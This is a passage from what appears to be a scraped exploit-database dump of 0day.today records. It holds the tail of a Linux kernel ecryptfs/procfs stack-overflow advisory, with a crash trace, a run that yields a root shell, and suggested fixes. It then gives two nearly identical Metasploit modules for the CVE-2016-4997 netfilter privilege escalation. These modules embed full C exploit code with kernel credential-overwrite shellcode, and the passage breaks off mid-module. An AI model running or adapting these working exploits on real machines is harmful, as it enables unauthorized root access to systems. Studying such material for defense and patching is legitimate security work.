tick_sched_handle.isra.14+0x60/0x60\r\n[ 80.040028] [<ffffffff810ee961>] update_process_times+0x51/0x60\r\n[ 80.040028] [<ffffffff810fe525>] tick_sched_handle.isra.14+0x25/0x60\r\n[ 80.040028] [<ffffffff810fe59d>] tick_sched_timer+0x3d/0x70\r\n[ 80.040028] [<ffffffff810ef282>] __hrtimer_run_queues+0x102/0x290\r\n[ 80.040028] [<ffffffff810efa48>] hrtimer_interrupt+0xa8/0x1a0\r\n[ 80.040028] [<ffffffff81052fa8>] local_apic_timer_interrupt+0x38/0x60\r\n[ 80.040028] [<ffffffff81827d9d>] smp_apic_timer_interrupt+0x3d/0x50\r\n[ 80.040028] [<ffffffff81826062>] apic_timer_interrupt+0x82/0x90\r\n[ 80.040028] <EOI> \r\n[ 80.040028] Code: 0f 1f 84 00 00 00 00 00 66 66 66 66 90 48 8b 47 08 48 8b 97 78 07 00 00 55 48 63 48 10 48 8b 52 60 48 89 e5 48 8b 82 b8 00 00 00 <48> 03 04 cd 80 42 f3 81 48 01 30 48 8b 52 48 48 85 d2 75 e5 5d \r\n[ 80.040028] RIP [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40\r\n[ 80.040028] RSP <ffff88021fc03d70>\r\n[ 80.040028] CR2: fffffffe4b9145c0\r\n[ 80.040028] fbcon_switch: detected unhandled fb_set_par error, error code -16\r\n[ 80.040028] fbcon_switch: detected unhandled fb_set_par error, error code -16\r\n[ 80.040028] ---[ end trace 616e3de50958c35b ]---\r\n[ 80.040028] Kernel panic - not syncing: Fatal exception in interrupt\r\n[ 80.040028] Shutting down cpus with NMI\r\n[ 80.040028] Kernel Offset: disabled\r\n[ 80.040028] ---[ end Kernel panic - not syncing: Fatal exception in interrupt\r\n```\r\n \r\nexample run of the exploit, in a VM with 4 cores, with Ubuntu 16.04 installed:\r\n \r\n```\r\n[email\u00a0protected]:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ls\r\ncompile.sh exploit.c hello.c suidhelper.c\r\n[email\u00a0protected]:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ./compile.sh \r\n[email\u00a0protected]:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ls\r\ncompile.sh exploit exploit.c hello hello.c suidhelper suidhelper.c\r\n[email\u00a0protected]:/media/sf_vm_shared/crypt_endless_recursion/exploit$ 
./exploit\r\nall spammers ready\r\nrecurser parent ready\r\nspam over\r\nfault chain set up, faulting now\r\nwriting stackframes\r\nstackframes written\r\nkilling 2494\r\npost-corruption code is alive!\r\nchildren should be dead\r\ncoredump handler set. recurser exiting.\r\ngoing to crash now\r\nsuid file detected, launching rootshell...\r\nwe have root privs now...\r\n[email\u00a0protected]:/proc# id\r\nuid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)\r\n```\r\n \r\n(If the exploit crashes even with the right kernel version, try\r\nrestarting the machine. Also, ensure that no program like top/htop/...\r\nis running that might try to read process command lines. Note that\r\nthe PoC and the exploit don't really clean up after themselves and\r\nleave mountpoints behind that prevent them from re-running without\r\na reboot or manual unmounting.)\r\n \r\nNote that Ubuntu compiled their kernel with\r\nCONFIG_SCHED_STACK_END_CHECK turned on, making it harder than it used\r\nto be in the past to not crash the kernel while exploiting this bug,\r\nand an overwrite of addr_limit would be useless because at the\r\ntime the thread_info is overwritten, there are multiple instances of\r\nkernel_read() on the stack. Still, the bug is exploitable by carefully\r\naligning the stack so that the vital components of thread_info are\r\npreserved, stopping with an out-of-bounds stack pointer and\r\noverwriting the thread stack using a normal write to an adjacent\r\nallocation of the buddy allocator.\r\n \r\nRegarding the fix, I think the following would be reasonable:\r\n \r\n - Explicitly forbid stacking anything on top of procfs by setting its\r\n s_stack_depth to a sufficiently large value. In my opinion, there\r\n is too much magic going on inside procfs to allow stacking things\r\n on top of it, and there isn't any good reason to do it. 
(For\r\n example, ecryptfs invokes open handlers from a kernel thread\r\n instead of normal user process context, so the access checks inside\r\n VFS open handlers are probably ineffective - and procfs relies\r\n heavily on those.)\r\n \r\n - Forbid opening files with f_op->mmap==NULL through ecryptfs. If the\r\n lower filesystem doesn't expect to be called in pagefault-handling\r\n context, it probably shouldn't be called in that context.\r\n \r\n - Create a dedicated kernel stack cache outside of the direct mapping\r\n of physical memory that has a guard page (or a multi-page gap) at\r\n the bottom of each stack, and move the struct thread_info to a\r\n different place (if nothing else works, the top of the stack, above\r\n the pt_regs).\r\n While e.g. race conditions are more common than stack overflows in\r\n the Linux kernel, the whole vulnerability class of stack overflows\r\n is easy to mitigate, and the kernel is sufficiently complicated for\r\n unbounded recursion to emerge in unexpected places - or perhaps\r\n even for someone to discover a way to create a stack with a bounded\r\n length that is still too high. Therefore, I believe that guard\r\n pages are a useful mitigation.\r\n Nearly everywhere, stack overflows are caught using guard pages\r\n nowadays; this includes Linux userland, but also {### TODO ###}\r\n and, on 64-bit systems, grsecurity (using GRKERNSEC_KSTACKOVERFLOW).\r\n \r\nOh, and by the way: The `BUG_ON(task_stack_end_corrupted(prev))`\r\nin schedule_debug() ought to be a direct panic instead of an oops. At\r\nthe moment, when you hit it, you get a recursion between the scheduler\r\ninvocation in do_exit() and the BUG_ON in the scheduler, and the\r\nkernel recurses down the stack until it hits something sufficiently\r\nimportant to cause a panic.\r\n \r\nI'm going to send (compile-tested) patches for my first two fix\r\nsuggestions and the recursive oops bug. 
I haven't written a patch for\r\nthe guard pages mitigation - I'm not familiar enough with the x86\r\nsubsystem for that.\r\n \r\n \r\nNotes regarding the exploit:\r\n \r\nIt makes an invalid assumption that causes it to require at least around 6GB of RAM.\r\n \r\nIt has a trivially avoidable race that causes it to fail on single-core systems after overwriting the coredump handler; if this happens, it's still possible to manually trigger a coredump and execute the suid helper to get a root shell.\r\n \r\nThe page spraying is pretty primitive and racy; while it works reliably for me, there might be influencing factors that cause it to fail on other people's machines.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39992.zip\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/25603"}, {"lastseen": "2018-04-11T21:58:13", "description": "This Metasploit module attempts to exploit a netfilter bug on Linux Kernels befoe 4.6.3, and currently only works against Ubuntu 16.04 (not 16.04.1) with kernel 4.4.0-21-generic. Several conditions have to be met for successful exploitation: Ubuntu: 1. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such) 2. 
libc6-dev-i386 (ubuntu), glibc-devel.i686", "edition": 2, "published": "2016-09-27T00:00:00", "type": "zdt", "title": "Linux Kernel 4.6.3 Netfilter Privilege Escalation Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-4997"], "modified": "2016-09-27T00:00:00", "id": "1337DAY-ID-24860", "href": "https://0day.today/exploit/description/24860", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire \"msf/core\"\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GoodRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Linux Kernel 4.6.3 Netfilter Privilege Escalation',\r\n 'Description' => %q{\r\n This module attempts to exploit a netfilter bug on Linux Kernels befoe 4.6.3, and currently\r\n only works against Ubuntu 16.04 (not 16.04.1) with kernel\r\n 4.4.0-21-generic.\r\n Several conditions have to be met for successful exploitation:\r\n Ubuntu:\r\n 1. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such)\r\n 2. 
libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) needs to be installed to compile\r\n Kernel 4.4.0-31-generic and newer are not vulnerable.\r\n\r\n We write the ascii files and compile on target instead of locally since metasm bombs for not\r\n having cdefs.h (even if locally installed)\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'h00die <[email\u00a0protected]>', # Module\r\n 'vnik' # Discovery\r\n ],\r\n 'DisclosureDate' => 'Jun 03 2016',\r\n 'Platform' => [ 'linux'],\r\n 'Arch' => [ ARCH_X86 ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' =>\r\n [\r\n [ 'Ubuntu', { } ]\r\n #[ 'Fedora', { } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'References' =>\r\n [\r\n [ 'EDB', '40049'],\r\n [ 'CVE', '2016-4997'],\r\n [ 'URL', 'http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ce683e5f9d045e5d67d1312a42b359cb2ab2a13c']\r\n ]\r\n ))\r\n register_options(\r\n [\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]),\r\n OptInt.new('MAXWAIT', [ true, 'Max seconds to wait for decrementation in seconds', 180 ]),\r\n OptBool.new('REEXPLOIT', [ true, 'desc already ran, no need to re-run, skip to running pwn',false]),\r\n OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n def iptables_loaded?()\r\n # [email\u00a0protected]:~$ cat /proc/modules | grep ip_tables\r\n # ip_tables 28672 1 iptable_filter, Live 0x0000000000000000\r\n # x_tables 36864 2 iptable_filter,ip_tables, Live 0x0000000000000000\r\n vprint_status('Checking if ip_tables is loaded in kernel')\r\n if target.name == \"Ubuntu\"\r\n iptables = cmd_exec('cat /proc/modules | grep ip_tables')\r\n if iptables.include?('ip_tables')\r\n vprint_good('ip_tables.ko is loaded')\r\n else\r\n print_error('ip_tables.ko is not loaded. 
root needs to run iptables -L or similar command')\r\n end\r\n return iptables.include?('ip_tables')\r\n elsif target.name == \"Fedora\"\r\n iptables = cmd_exec('cat /proc/modules | grep iptable_raw')\r\n if iptables.include?('iptable_raw')\r\n vprint_good('iptable_raw is loaded')\r\n else\r\n print_error('iptable_raw is not loaded. root needs to run iptables -L or similar command')\r\n end\r\n return iptables.include?('iptable_raw')\r\n else\r\n return false\r\n end\r\n end\r\n\r\n def shemsham_installed?()\r\n # we want this to be false.\r\n vprint_status('Checking if shem or sham are installed')\r\n shemsham = cmd_exec('cat /proc/cpuinfo')\r\n if shemsham.include?('shem')\r\n print_error('shem installed, system not vulnerable.')\r\n elsif shemsham.include?('sham')\r\n print_error('sham installed, system not vulnerable.')\r\n else\r\n vprint_good('shem and sham not present.')\r\n end\r\n return (shemsham.include?('shem') or shemsham.include?('sham'))\r\n end\r\n\r\n if iptables_loaded?() and not shemsham_installed?()\r\n return CheckCode::Appears\r\n else\r\n return CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit\r\n # first thing we need to do is determine our method of exploitation: compiling realtime, or droping a pre-compiled version.\r\n def has_prereqs?()\r\n vprint_status('Checking if 32bit C libraries, gcc-multilib, and gcc are installed')\r\n if target.name == \"Ubuntu\"\r\n lib = cmd_exec('dpkg --get-selections | grep libc6-dev-i386')\r\n if lib.include?('install')\r\n vprint_good('libc6-dev-i386 is installed')\r\n else\r\n print_error('libc6-dev-i386 is not installed. Compiling will fail.')\r\n end\r\n multilib = cmd_exec('dpkg --get-selections | grep ^gcc-multilib')\r\n if multilib.include?('install')\r\n vprint_good('gcc-multilib is installed')\r\n else\r\n print_error('gcc-multilib is not installed. 
Compiling will fail.')\r\n end\r\n gcc = cmd_exec('which gcc')\r\n if gcc.include?('gcc')\r\n vprint_good('gcc is installed')\r\n else\r\n print_error('gcc is not installed. Compiling will fail.')\r\n end\r\n return gcc.include?('gcc') && lib.include?('install') && multilib.include?('install')\r\n elsif target.name == \"Fedora\"\r\n lib = cmd_exec('dnf list installed | grep -E \\'(glibc-devel.i686|libgcc.i686)\\'')\r\n if lib.include?('glibc')\r\n vprint_good('glibc-devel.i686 is installed')\r\n else\r\n print_error('glibc-devel.i686 is not installed. Compiling will fail.')\r\n end\r\n if lib.include?('libgcc')\r\n vprint_good('libgcc.i686 is installed')\r\n else\r\n print_error('libgcc.i686 is not installed. Compiling will fail.')\r\n end\r\n multilib = false #not implemented\r\n gcc = false #not implemented\r\n return (lib.include?('glibc') && lib.include?('libgcc')) && gcc && multilib\r\n else\r\n return false\r\n end\r\n end\r\n\r\n compile = false\r\n if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True'\r\n if has_prereqs?()\r\n compile = true\r\n vprint_status('Live compiling exploit on system')\r\n else\r\n vprint_status('Dropping pre-compiled exploit on system')\r\n end\r\n end\r\n if check != CheckCode::Appears\r\n fail_with(Failure::NotVulnerable, 'Target not vulnerable! 
punt!')\r\n end\r\n\r\n desc_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8)\r\n env_ready_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8)\r\n pwn_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8)\r\n payload_file = rand_text_alpha(8)\r\n payload_path = \"#{datastore[\"WritableDir\"]}/#{payload_file}\"\r\n\r\n # direct copy of code from exploit-db, except removed the check for shem/sham and ip_tables.ko since we can do that in the check area here\r\n # removed #include <netinet/in.h> per busterb comment in PR 7326\r\n decr = %q{\r\n #define _GNU_SOURCE\r\n #include <stdio.h>\r\n #include <stdlib.h>\r\n #include <string.h>\r\n #include <unistd.h>\r\n #include <sched.h>\r\n #include <netinet/in.h>\r\n #include <linux/sched.h>\r\n #include <errno.h>\r\n #include <sys/types.h>\r\n #include <sys/socket.h>\r\n #include <sys/ptrace.h>\r\n #include <net/if.h>\r\n #include <linux/netfilter_ipv4/ip_tables.h>\r\n #include <linux/netlink.h>\r\n #include <fcntl.h>\r\n #include <sys/mman.h>\r\n\r\n #define MALLOC_SIZE 66*1024\r\n\r\n int decr(void *p) {\r\n int sock, optlen;\r\n int ret;\r\n void *data;\r\n struct ipt_replace *repl;\r\n struct ipt_entry *entry;\r\n struct xt_entry_match *ematch;\r\n struct xt_standard_target *target;\r\n unsigned i;\r\n\r\n sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);\r\n\r\n if (sock == -1) {\r\n perror(\"socket\");\r\n return -1;\r\n }\r\n\r\n data = malloc(MALLOC_SIZE);\r\n\r\n if (data == NULL) {\r\n perror(\"malloc\");\r\n return -1;\r\n }\r\n\r\n memset(data, 0, MALLOC_SIZE);\r\n\r\n repl = (struct ipt_replace *) data;\r\n repl->num_entries = 1;\r\n repl->num_counters = 1;\r\n repl->size = sizeof(*repl) + sizeof(*target) + 0xffff;\r\n repl->valid_hooks = 0;\r\n\r\n entry = (struct ipt_entry *) (data + sizeof(struct ipt_replace));\r\n entry->target_offset = 74; // overwrite target_offset\r\n entry->next_offset = sizeof(*entry) + sizeof(*ematch) + sizeof(*target);\r\n\r\n 
ematch = (struct xt_entry_match *) (data + sizeof(struct ipt_replace) + sizeof(*entry));\r\n\r\n strcpy(ematch->u.user.name, \"icmp\");\r\n void *kmatch = (void*)mmap((void *)0x10000, 0x1000, 7, 0x32, 0, 0);\r\n uint64_t *me = (uint64_t *)(kmatch + 0x58);\r\n *me = 0xffffffff821de10d; // magic number!\r\n\r\n uint32_t *match = (uint32_t *)((char *)&ematch->u.kernel.match + 4);\r\n *match = (uint32_t)kmatch;\r\n\r\n ematch->u.match_size = (short)0xffff;\r\n\r\n target = (struct xt_standard_target *)(data + sizeof(struct ipt_replace) + 0xffff + 0x8);\r\n uint32_t *t = (uint32_t *)target;\r\n *t = (uint32_t)kmatch;\r\n\r\n printf(\"[!] Decrementing the refcount. This may take a while...\\n\");\r\n printf(\"[!] Wait for the \\\"Done\\\" message (even if you'll get the prompt back).\\n\");\r\n\r\n for (i = 0; i < 0xffffff/2+1; i++) {\r\n ret = setsockopt(sock, SOL_IP, IPT_SO_SET_REPLACE, (void *) data, 66*1024);\r\n }\r\n\r\n close(sock);\r\n free(data);\r\n printf(\"[+] Done! Now run ./pwn\\n\");\r\n\r\n return 0;\r\n }\r\n\r\n int main(void) {\r\n void *stack;\r\n int ret;\r\n\r\n printf(\"netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik\\n\");\r\n\r\n ret = unshare(CLONE_NEWUSER);\r\n\r\n if (ret == -1) {\r\n perror(\"unshare\");\r\n return -1;\r\n }\r\n\r\n stack = (void *) malloc(65536);\r\n\r\n if (stack == NULL) {\r\n perror(\"malloc\");\r\n return -1;\r\n }\r\n\r\n clone(decr, stack + 65536, CLONE_NEWNET, NULL);\r\n\r\n sleep(1);\r\n\r\n return 0;\r\n }\r\n }\r\n\r\n # direct copy of code from exploit-db\r\n pwn = %q{\r\n #include <stdio.h>\r\n #include <string.h>\r\n #include <errno.h>\r\n #include <unistd.h>\r\n #include <stdint.h>\r\n #include <fcntl.h>\r\n #include <sys/mman.h>\r\n #include <assert.h>\r\n\r\n #define MMAP_ADDR 0xff814e3000\r\n #define MMAP_OFFSET 0xb0\r\n\r\n typedef int __attribute__((regparm(3))) (*commit_creds_fn)(uint64_t cred);\r\n typedef uint64_t __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(uint64_t 
cred);\r\n\r\n void __attribute__((regparm(3))) privesc() {\r\n commit_creds_fn commit_creds = (void *)0xffffffff810a21c0;\r\n prepare_kernel_cred_fn prepare_kernel_cred = (void *)0xffffffff810a25b0;\r\n commit_creds(prepare_kernel_cred((uint64_t)NULL));\r\n }\r\n\r\n int main() {\r\n void *payload = (void*)mmap((void *)MMAP_ADDR, 0x400000, 7, 0x32, 0, 0);\r\n assert(payload == (void *)MMAP_ADDR);\r\n\r\n void *shellcode = (void *)(MMAP_ADDR + MMAP_OFFSET);\r\n\r\n memset(shellcode, 0, 0x300000);\r\n\r\n void *ret = memcpy(shellcode, &privesc, 0x300);\r\n assert(ret == shellcode);\r\n\r\n printf(\"[+] Escalating privs...\\n\");\r\n\r\n int fd = open(\"/dev/ptmx\", O_RDWR);\r\n close(fd);\r\n\r\n assert(!getuid());\r\n\r\n printf(\"[+] We've got root!\");\r\n\r\n return execl(\"/bin/bash\", \"-sh\", NULL);\r\n }\r\n }\r\n\r\n # the original code printed a line. However, this is hard to detect due to threading.\r\n # so instead we can write a file in /tmp to catch.\r\n decr.gsub!(/printf\\(\"\\[\\+\\] Done\\! 
Now run \\.\\/pwn\\\\n\"\\);/,\r\n \"int fd2 = open(\\\"#{env_ready_file}\\\", O_RDWR|O_CREAT, 0777);close(fd2);\" )\r\n\r\n # patch in to run our payload\r\n pwn.gsub!(/execl\\(\"\\/bin\\/bash\", \"-sh\", NULL\\);/,\r\n \"execl(\\\"#{payload_path}\\\", NULL);\")\r\n\r\n def pwn(payload_path, pwn_file, pwn, compile)\r\n # lets write our payload since everythings set for priv esc\r\n vprint_status(\"Writing payload to #{payload_path}\")\r\n write_file(payload_path, generate_payload_exe)\r\n cmd_exec(\"chmod 555 #{payload_path}\")\r\n register_file_for_cleanup(payload_path)\r\n\r\n # now lets drop part 2, and finish up.\r\n rm_f pwn_file\r\n if compile\r\n print_status \"Writing pwn executable to #{pwn_file}.c\"\r\n rm_f \"#{pwn_file}.c\"\r\n write_file(\"#{pwn_file}.c\", pwn)\r\n cmd_exec(\"gcc #{pwn_file}.c -O2 -o #{pwn_file}\")\r\n register_file_for_cleanup(\"#{pwn_file}.c\")\r\n else\r\n print_status \"Writing pwn executable to #{pwn_file}\"\r\n write_file(pwn_file, pwn)\r\n end\r\n register_file_for_cleanup(pwn_file)\r\n cmd_exec(\"chmod +x #{pwn_file}; #{pwn_file}\")\r\n end\r\n\r\n if not compile # we need to override with our pre-created binary\r\n # pwn file\r\n path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-pwn.out')\r\n fd = ::File.open( path, \"rb\")\r\n pwn = fd.read(fd.stat.size)\r\n fd.close\r\n # desc file\r\n path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-decr.out')\r\n fd = ::File.open( path, \"rb\")\r\n decr = fd.read(fd.stat.size)\r\n fd.close\r\n\r\n # overwrite the hardcoded variable names in the compiled versions\r\n env_ready_file = '/tmp/okDjTFSS'\r\n payload_path = '/tmp/2016_4997_payload'\r\n end\r\n\r\n # check for shortcut\r\n if datastore['REEXPLOIT']\r\n pwn(payload_path, pwn_file, pwn, compile)\r\n else\r\n rm_f desc_file\r\n if compile\r\n print_status \"Writing desc executable to #{desc_file}.c\"\r\n rm_f \"#{desc_file}.c\"\r\n 
write_file(\"#{desc_file}.c\", decr)\r\n register_file_for_cleanup(\"#{desc_file}.c\")\r\n output = cmd_exec(\"gcc #{desc_file}.c -m32 -O2 -o #{desc_file}\")\r\n else\r\n write_file(desc_file, decr)\r\n end\r\n rm_f env_ready_file\r\n register_file_for_cleanup(env_ready_file)\r\n #register_file_for_cleanup(desc_file)\r\n if not file_exist?(desc_file)\r\n vprint_error(\"gcc failure output: #{output}\")\r\n fail_with(Failure::Unknown, \"#{desc_file}.c failed to compile\")\r\n end\r\n if target.name == \"Ubuntu\"\r\n vprint_status \"Executing #{desc_file}, may take around 35s to finish. Watching for #{env_ready_file} to be created.\"\r\n elsif target.name == \"Fedora\"\r\n vprint_status \"Executing #{desc_file}, may take around 80s to finish. Watching for #{env_ready_file} to be created.\"\r\n end\r\n cmd_exec(\"chmod +x #{desc_file}; #{desc_file}\")\r\n sec_waited = 0\r\n\r\n until sec_waited > datastore['MAXWAIT'] do\r\n Rex.sleep(1)\r\n if sec_waited % 10 == 0\r\n vprint_status(\"Waited #{sec_waited}s so far\")\r\n end\r\n\r\n if file_exist?(env_ready_file)\r\n print_good(\"desc finished, env ready.\")\r\n pwn(payload_path, pwn_file, pwn, compile)\r\n return\r\n end\r\n sec_waited +=1\r\n end\r\n end\r\n end\r\nend\n\n# 0day.today [2018-04-11] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/24860"}, {"lastseen": "2018-04-08T09:43:05", "description": "This Metasploit module attempts to exploit a netfilter bug on Linux Kernels before 4.6.3, and currently only works against Ubuntu 16.04 (not 16.04.1) with kernel 4.4.0-21-generic. 
Several conditions have to be met for successful exploitation.", "edition": 1, "published": "2016-11-24T00:00:00", "title": "Linux Kernel 4.6.3 Netfilter Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-4997"], "modified": "2016-11-24T00:00:00", "href": "https://0day.today/exploit/description/26412", "id": "1337DAY-ID-26412", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire \"msf/core\"\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GoodRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Linux Kernel 4.6.3 Netfilter Privilege Escalation',\r\n 'Description' => %q{\r\n This module attempts to exploit a netfilter bug on Linux Kernels befoe 4.6.3, and currently\r\n only works against Ubuntu 16.04 (not 16.04.1) with kernel\r\n 4.4.0-21-generic.\r\n Several conditions have to be met for successful exploitation:\r\n Ubuntu:\r\n 1. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such)\r\n 2. 
libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) needs to be installed to compile\r\n Kernel 4.4.0-31-generic and newer are not vulnerable.\r\n\r\n We write the ascii files and compile on target instead of locally since metasm bombs for not\r\n having cdefs.h (even if locally installed)\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'h00die <mike@stcyrsecurity.com>', # Module\r\n 'vnik' # Discovery\r\n ],\r\n 'DisclosureDate' => 'Jun 03 2016',\r\n 'Platform' => [ 'linux'],\r\n 'Arch' => [ ARCH_X86 ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' =>\r\n [\r\n [ 'Ubuntu', { } ]\r\n #[ 'Fedora', { } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'References' =>\r\n [\r\n [ 'EDB', '40049'],\r\n [ 'CVE', '2016-4997'],\r\n [ 'URL', 'http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ce683e5f9d045e5d67d1312a42b359cb2ab2a13c']\r\n ]\r\n ))\r\n register_options(\r\n [\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]),\r\n OptInt.new('MAXWAIT', [ true, 'Max seconds to wait for decrementation in seconds', 180 ]),\r\n OptBool.new('REEXPLOIT', [ true, 'desc already ran, no need to re-run, skip to running pwn',false]),\r\n OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n def iptables_loaded?()\r\n # user@ubuntu:~$ grep ip_tables /proc/modules\r\n # ip_tables 28672 1 iptable_filter, Live 0x0000000000000000\r\n # x_tables 36864 2 iptable_filter,ip_tables, Live 0x0000000000000000\r\n vprint_status('Checking if ip_tables is loaded in kernel')\r\n if target.name == \"Ubuntu\"\r\n iptables = read_file('/proc/modules')\r\n if iptables.include?('ip_tables')\r\n vprint_good('ip_tables.ko is loaded')\r\n else\r\n print_error('ip_tables.ko is not loaded. 
root needs to run iptables -L or similar command')\r\n end\r\n return iptables.include?('ip_tables')\r\n elsif target.name == \"Fedora\"\r\n iptables = read_file('/proc/modules')\r\n if iptables.include?('iptable_raw')\r\n vprint_good('iptable_raw is loaded')\r\n else\r\n print_error('iptable_raw is not loaded. root needs to run iptables -L or similar command')\r\n end\r\n return iptables.include?('iptable_raw')\r\n else\r\n return false\r\n end\r\n end\r\n\r\n def shemsham_installed?()\r\n # we want this to be false.\r\n vprint_status('Checking if shem or sham are installed')\r\n shemsham = read_file('/proc/cpuinfo')\r\n if shemsham.include?('shem')\r\n print_error('shem installed, system not vulnerable.')\r\n elsif shemsham.include?('sham')\r\n print_error('sham installed, system not vulnerable.')\r\n else\r\n vprint_good('shem and sham not present.')\r\n end\r\n return (shemsham.include?('shem') or shemsham.include?('sham'))\r\n end\r\n\r\n if iptables_loaded?() and not shemsham_installed?()\r\n return CheckCode::Appears\r\n else\r\n return CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit\r\n # first thing we need to do is determine our method of exploitation: compiling realtime, or droping a pre-compiled version.\r\n def has_prereqs?()\r\n vprint_status('Checking if 32bit C libraries, gcc-multilib, and gcc are installed')\r\n if target.name == \"Ubuntu\"\r\n lib = cmd_exec('dpkg --get-selections | grep libc6-dev-i386')\r\n if lib.include?('install')\r\n vprint_good('libc6-dev-i386 is installed')\r\n else\r\n print_error('libc6-dev-i386 is not installed. Compiling will fail.')\r\n end\r\n multilib = cmd_exec('dpkg --get-selections | grep ^gcc-multilib')\r\n if multilib.include?('install')\r\n vprint_good('gcc-multilib is installed')\r\n else\r\n print_error('gcc-multilib is not installed. Compiling will fail.')\r\n end\r\n gcc = cmd_exec('which gcc')\r\n if gcc.include?('gcc')\r\n vprint_good('gcc is installed')\r\n else\r\n print_error('gcc is not installed. 
Compiling will fail.')\r\n end\r\n return gcc.include?('gcc') && lib.include?('install') && multilib.include?('install')\r\n elsif target.name == \"Fedora\"\r\n lib = cmd_exec('dnf list installed | grep -E \\'(glibc-devel.i686|libgcc.i686)\\'')\r\n if lib.include?('glibc')\r\n vprint_good('glibc-devel.i686 is installed')\r\n else\r\n print_error('glibc-devel.i686 is not installed. Compiling will fail.')\r\n end\r\n if lib.include?('libgcc')\r\n vprint_good('libgcc.i686 is installed')\r\n else\r\n print_error('libgcc.i686 is not installed. Compiling will fail.')\r\n end\r\n multilib = false #not implemented\r\n gcc = false #not implemented\r\n return (lib.include?('glibc') && lib.include?('libgcc')) && gcc && multilib\r\n else\r\n return false\r\n end\r\n end\r\n\r\n compile = false\r\n if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True'\r\n if has_prereqs?()\r\n compile = true\r\n vprint_status('Live compiling exploit on system')\r\n else\r\n vprint_status('Dropping pre-compiled exploit on system')\r\n end\r\n end\r\n if check != CheckCode::Appears\r\n fail_with(Failure::NotVulnerable, 'Target not vulnerable! 
punt!')\r\n end\r\n\r\n desc_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8)\r\n env_ready_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8)\r\n pwn_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8)\r\n payload_file = rand_text_alpha(8)\r\n payload_path = \"#{datastore[\"WritableDir\"]}/#{payload_file}\"\r\n\r\n # direct copy of code from exploit-db, except removed the check for shem/sham and ip_tables.ko since we can do that in the check area here\r\n # removed #include <netinet/in.h> per busterb comment in PR 7326\r\n decr = %q{\r\n #define _GNU_SOURCE\r\n #include <stdio.h>\r\n #include <stdlib.h>\r\n #include <string.h>\r\n #include <unistd.h>\r\n #include <sched.h>\r\n #include <netinet/in.h>\r\n #include <linux/sched.h>\r\n #include <errno.h>\r\n #include <sys/types.h>\r\n #include <sys/socket.h>\r\n #include <sys/ptrace.h>\r\n #include <net/if.h>\r\n #include <linux/netfilter_ipv4/ip_tables.h>\r\n #include <linux/netlink.h>\r\n #include 